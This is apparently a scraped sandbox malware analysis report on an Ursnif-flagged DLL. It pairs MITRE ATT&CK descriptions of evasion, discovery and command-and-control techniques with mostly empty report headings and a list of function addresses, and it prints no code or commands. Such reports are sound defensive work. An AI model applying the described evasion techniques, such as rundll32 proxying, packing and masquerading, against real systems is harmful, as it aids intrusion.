Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report kZcCqvNtWa.dll

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

UDP Packets

DNS Queries

DNS Answers

Code Manipulations

Statistics

CPU Usage

Function 001D4C3B, Relevance: 34.7, APIs: 23, Instructions: 222
memoryfiletimeCOMMON

Function 6E241237, Relevance: 15.1, APIs: 10, Instructions: 98
threadsleepsynchronizationCOMMON

Function 001D2D6E, Relevance: 12.1, APIs: 8, Instructions: 103
memoryCOMMON

Function 001D1168, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Function 6E2415F1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Function 6E241F14, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Function 001D24B4, Relevance: 33.2, APIs: 22, Instructions: 245
memorystringCOMMON

Function 001DAD95, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209
libraryCOMMON

Function 001D8494, Relevance: 16.6, APIs: 11, Instructions: 150
timememoryCOMMON

Function 6E241352, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Function 001D81E7, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Function 001D523A, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60
sleepmemorytimeCOMMON

Function 001D54DA, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Function 6E24150D, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Function 6E241F56, Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Function 6E24179C, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Function 001D5C02, Relevance: 7.7, APIs: 5, Instructions: 159
memoryCOMMON

Function 6E2410E8, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 111
memoryCOMMON

Function 001D6BC0, Relevance: 6.1, APIs: 4, Instructions: 59
COMMON

Function 6E24173D, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Function 001D579B, Relevance: 4.6, APIs: 3, Instructions: 94
memoryCOMMON

Function 001D8A1D, Relevance: 4.6, APIs: 3, Instructions: 76
memoryCOMMON

Function 6E241E32, Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Function 001D620F, Relevance: 3.9, APIs: 3, Instructions: 154
stringCOMMON

Function 001D59F9, Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Function 6E241424, Relevance: 3.1, APIs: 2, Instructions: 59
stringthreadCOMMON

Function 001D3F0E, Relevance: 3.0, APIs: 2, Instructions: 40
COMMON

Function 001D6456, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Function 001D497C, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Function 6E2410BC, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON